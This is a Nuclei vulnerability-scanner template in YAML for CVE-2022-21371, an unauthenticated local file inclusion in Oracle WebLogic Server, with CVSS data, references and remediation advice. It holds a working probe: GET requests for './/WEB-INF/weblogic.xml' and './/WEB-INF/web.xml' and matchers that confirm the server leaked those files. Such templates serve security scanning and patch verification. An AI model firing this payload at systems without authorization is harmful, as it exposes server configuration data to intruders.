nuclei-templates/http/cves/2022/CVE-2022-21371.yaml

63 lines
2.2 KiB
YAML

id: CVE-2022-21371
info:
name: Oracle WebLogic Server Local File Inclusion
author: paradessia,narluin
severity: high
description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
remediation: |
Apply the latest security patches provided by Oracle to fix the vulnerability.
reference:
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
- http://packetstormsecurity.com/files/165736/Oracle-WebLogic-Server-14.1.1.0.0-Local-File-Inclusion.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-21371
cwe-id: CWE-22
epss-score: 0.96287
epss-percentile: 0.99369
cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: oracle
product: weblogic_server
tags: cve,cve2022,lfi,weblogic,oracle,packetstorm
http:
- method: GET
raw:
- |+
GET {{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- .//WEB-INF/weblogic.xml
- .//WEB-INF/web.xml
stop-at-first-match: true
unsafe: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body, "<web-app") && contains(body, "</web-app>")'
- 'contains(body, "<weblogic-web-app") && contains(body, "</weblogic-web-app>")'
condition: or
- type: dsl
dsl:
- 'contains(header, "text/xml")'
- 'contains(header, "application/xml")'
condition: or
- type: status
status:
- 200
# digest: 4a0a00473045022100ac7643d9c6c6e1fbc961e34c991d58686784a852368741e9647c69ba14ffa2e9022067cd2bee38c9d7227970125d8f77139dc1598fd8cba97e6735a3d4807c8a2ed4:922c64590222798bb761d5b6d8e72950